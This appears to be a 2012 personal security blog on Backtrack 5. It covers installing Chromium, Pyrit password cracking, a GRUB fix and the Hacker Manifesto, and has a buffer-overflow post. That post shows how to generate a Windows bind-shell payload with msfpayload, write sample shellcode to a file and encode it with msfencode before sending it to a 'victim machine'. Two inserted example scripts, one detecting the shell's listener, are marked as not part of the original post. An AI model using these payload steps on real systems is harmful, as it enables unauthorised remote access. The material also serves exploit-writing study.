As many of you have noticed, Google Chrome doesn't come installed in Backtrack 5.
So, in this post we will learn how to install it.
The installation was made in Backtrack 5 R3.
Step 1
Open a new command session and type:
apt-get install chromium-browser
Step 2
Access the chrome browser directory:
cd /usr/lib/chromium-browser
All IT Security
Saturday, November 10, 2012
Buffer Overflow - Some thoughts
In this post I'll talk about Buffer Overflow Exploitation in Windows.
Keep in mind that this is not intended to teach you, or anything like that; this blog is for personal use and will contain info that I don't wanna lose or forget. Anyway, I share it with everyone so that it can be helpful for other people.
I learned about buffer overflows from the link below, one of the many tutorials by the Corelan team:
https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
That is an extremely good tutorial, one that you can actually follow and understand, and especially one that you can test yourself.
At the end of the tutorial there is a kind of challenge: you should be able to get your shellcode to open a telnet connection on the remote computer. Getting that shellcode into the exploit is the challenge part.
The way I found to do it was:
Get the payload from msfpayload:
msfpayload windows/shell_bind_tcp
That will create the shellcode for a telnet connection with an open port at 4444 (default).
Now, if you test it, it will not work, because it probably has nulls and bad chars not supported by the RMtoMP3 application, so we have to use an encoder.
Here comes the trick:
Step 1
Imagine this is the shellcode (this is just an example):
\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18
\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b
\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac
\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4
\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58
\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b
What you have to do is create a script that writes the shellcode to a binary file.
For this example, I will use Python as the scripting language:
#!/usr/bin/python
# Example shellcode fragment from above, kept as raw bytes
shell = (b"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b")
# Open in binary mode so the bytes are written unchanged
with open('shellcode.bin', 'wb') as f:
    f.write(shell)
Step 2
After running the script you will have a shellcode.bin file. So now it is time to use our encoder:
msfencode -e x86/alpha_upper -b '\x00' -i Desktop/shellcode.bin -t c
Where:
-e ... -> is the type of encoder you wanna use. You can get a list of them using msfencode -l
-b ... -> is the characters you want to avoid, in this case the null
-i ... -> is the file you want to encode
and
-t ... -> is the output file format
With all this set, you now have the correct shellcode and just need to add it to your own exploit.
Send it to the victim machine and Voilà!!!
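Seen from the host being tested, the bind payload described above shows up as a TCP listener on port 4444 (the default the post mentions). The script below is an added example, not part of the original post: it filters saved `netstat -ano` output from a Windows host for such listeners. The sample output and the function names `sample_netstat` and `find_listeners` are constructed for illustration.

```shell
#!/bin/sh
# Constructed sample of `netstat -ano` output saved from a Windows host.
# Addresses and PIDs are made up for this example.
sample_netstat() {
cat <<'EOF'

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       716
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       3120
  TCP    192.168.56.10:49210    192.168.56.1:4444      ESTABLISHED     2044
  TCP    [::]:4444              [::]:0                 LISTENING       3120
  UDP    0.0.0.0:4444           *:*                                    1500
EOF
}

# find_listeners PORT
# Reads netstat -ano text on stdin and prints "local-address pid" for every
# TCP socket in state LISTENING whose local port equals PORT.
# Outbound connections *to* that port and UDP sockets are ignored.
find_listeners() {
    awk -v port="$1" '
        $1 == "TCP" && $4 == "LISTENING" {
            # The port is the text after the last ":", which also
            # handles bracketed IPv6 addresses such as [::]:4444.
            n = split($2, parts, ":")
            if (parts[n] == port) print $2, $5
        }'
}

# Example: list listeners on 4444 in the constructed sample.
# sample_netstat | find_listeners 4444
```

The PID in the second column can then be matched against the process list (for example `tasklist` on the same host) to see which program owns the listener.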
Saturday, November 3, 2012
Install Pyrit and the same as CUDA but now for ATI
In this post I was about to present here the opponent of CUDA.
If you have an nVIDIA driver you should use CUDA, and for that you should follow this link: How to Install Cuda on nVIDIA Optimus
If that's not your case and you have an ATI you should go for OpenCL.
I could make a tutorial here, how to install it, but actually in backtrack wiki you can find a very good one, done with the contribution of "g0tmi1k". Check it here: http://www.backtrack-linux.org/wiki/index.php/Install_OpenCL
I'll show you some results I got using pyrit:
Hardware:
Running in 32Gb USB drive
OS: Backtrack 5 R3
Display Card: AMD Radeon HD 6950 DirectCUII 1GB GDDR5
CPU: Core 2 Quad Q6600 2.4Ghz
RAM: 4096MB
As far as I can say, I advise the use of ATI drives to crack passwords, because they are really much faster than CUDA imo.
How to Install CUDA on nVIDIA Optimus with Backtrack 5 R3
In this post you will learn how to set up a notebook with nVidia Optimus technology working with CUDA. All the information that I present here would not be possible without the help of "Samiux", who helped me get through this problem.
You can find his blog here: http://samiux.blogspot.hk
This was tested in my own notebook with the below specs:
Brand : Asus n82jv-vx072v
CPU : Intel i5 450M, 2.4Ghz
RAM : 4096MB DDR3 1066
Display card : nVidia GeForce GT335M 1G VRAM DDR3
Fix Blank Screen when using Startx
When Backtrack 5 was released, the most common issue was a blank screen when using the "startx" command to start the GUI mode. This common issue is caused by unsupported VGA drivers on some machines. The blank screen issue is still found on Backtrack 5 R1, R2 and recently Backtrack R3.
When I installed Backtrack 5 R3 I came across this problem, but managed to find a fix:
What we need to do is add a kernel parameter to the GRUB configuration.
If you're using a live CD or live USB you will come across the below menu, and there you should select "Default Boot Text Mode" and press "Tab".
You should then add "i915.modeset=1" in the GRUB editor after "vga = 791 splash text" and press [Enter].
If the problem persists after installing Backtrack, edit the GRUB configuration file located in /etc/default/grub.
Find the line that says:
GRUB_CMDLINE_LINUX_DEFAULT
and add the same code "i915.modeset=1" after the "vga = 791 splash text".
After that, run the commands:
update-grub
fix-splash
It should be working properly now.
If not, check my next two fixes.
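The /etc/default/grub edit described above can be scripted so that it is repeatable and leaves a backup. This is an added example, not from the original post; the function names `add_kernel_param` and `demo` and the sample file contents are assumptions made for illustration.

```shell
#!/bin/sh
# add_kernel_param FILE PARAM
# Append PARAM to the GRUB_CMDLINE_LINUX_DEFAULT="..." line in FILE unless it
# is already there. Keeps the previous version as FILE.bak.
# Returns 1 if FILE has no such line.
# Assumption: PARAM contains no "|" or "&" (both are special to sed here).
add_kernel_param() {
    file=$1
    param=$2
    grep -q '^GRUB_CMDLINE_LINUX_DEFAULT="' "$file" || return 1
    # Already present as a whole word on that line: nothing to do.
    if grep '^GRUB_CMDLINE_LINUX_DEFAULT="' "$file" | grep -qwF -- "$param"; then
        return 0
    fi
    cp -p "$file" "$file.bak"
    # Insert the parameter just before the closing quote of that line only.
    sed "s|^\(GRUB_CMDLINE_LINUX_DEFAULT=\".*\)\"|\1 $param\"|" \
        "$file.bak" > "$file"
}

# demo: run the edit twice on a constructed copy of the file and print the
# resulting line, showing that the second run changes nothing.
demo() {
    tmp=$(mktemp)
    # Constructed sample contents, not a real /etc/default/grub.
    printf '%s\n' 'GRUB_DEFAULT=0' \
        'GRUB_CMDLINE_LINUX_DEFAULT="vga=791 splash text"' > "$tmp"
    add_kernel_param "$tmp" i915.modeset=1
    add_kernel_param "$tmp" i915.modeset=1
    grep '^GRUB_CMDLINE_LINUX_DEFAULT=' "$tmp"
    rm -f "$tmp" "$tmp.bak"
}

# On the installed system (as root):
#   add_kernel_param /etc/default/grub i915.modeset=1 && update-grub
```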
The Hacker Manifesto
My 1st post will go to this important manifesto in the hacker community.
The Manifesto was written in 1986 by Loyd Blankenship aka "The Mentor".
You can find the Manifesto below in text and in mp3 with "The Mentor" reading his own Manifesto and talking about it and his history.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The following was written shortly after my arrest...
\/\The Conscience of a Hacker/\/
by
+++The Mentor+++
Written on January 8, 1986
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Another one got caught today, it's all over the papers. "Teenager Arrested in Computer Crime Scandal", "Hacker Arrested after Bank Tampering"...
Damn kids. They're all alike.
But did you, in your three-piece psychology and 1950's technobrain, ever take a look behind the eyes of the hacker? Did you ever wonder what made him tick, what forces shaped him, what may have molded him?
I am a hacker, enter my world...
Mine is a world that begins with school... I'm smarter than most of the other kids, this crap they teach us bores me...
Damn underachiever. They're all alike.
I'm in junior high or high school. I've listened to teachers explain for the fifteenth time how to reduce a fraction. I understand it. "No, Ms. Smith, I didn't show my work. I did it in my head..."
Damn kid. Probably copied it. They're all alike.
I made a discovery today. I found a computer. Wait a second, this is cool. It does what I want it to. If it makes a mistake, it's because I screwed it up. Not because it doesn't like me... Or feels threatened by me... Or thinks I'm a smart ass... Or doesn't like teaching and shouldn't be here...
Damn kid. All he does is play games. They're all alike.
And then it happened... a door opened to a world... rushing through the phone line like heroin through an addict's veins, an electronic pulse is sent out, a refuge from the day-to-day incompetencies is sought... a board is found. "This is it... this is where I belong..." I know everyone here... even if I've never met them, never talked to them, may never hear from them again... I know you all...
Damn kid. Tying up the phone line again. They're all alike...
You bet your ass we're all alike... we've been spoon-fed baby food at school when we hungered for steak... the bits of meat that you did let slip through were pre-chewed and tasteless. We've been dominated by sadists, or ignored by the apathetic. The few that had something to teach found us willing pupils, but those few are like drops of water in the desert.
This is our world now... the world of the electron and the switch, the beauty of the baud. We make use of a service already existing without paying for what could be dirt-cheap if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We seek after knowledge... and you call us criminals. We exist without skin color, without nationality, without religious bias... and you call us criminals. You build atomic bombs, you wage wars, you murder, cheat, and lie to us and try to make us believe it's for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you, something that you will never forgive me for.
I am a hacker, and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.
+++The Mentor+++
_______________________________________________________________________________
The Hacker Manifesto by "The Mentor".mp3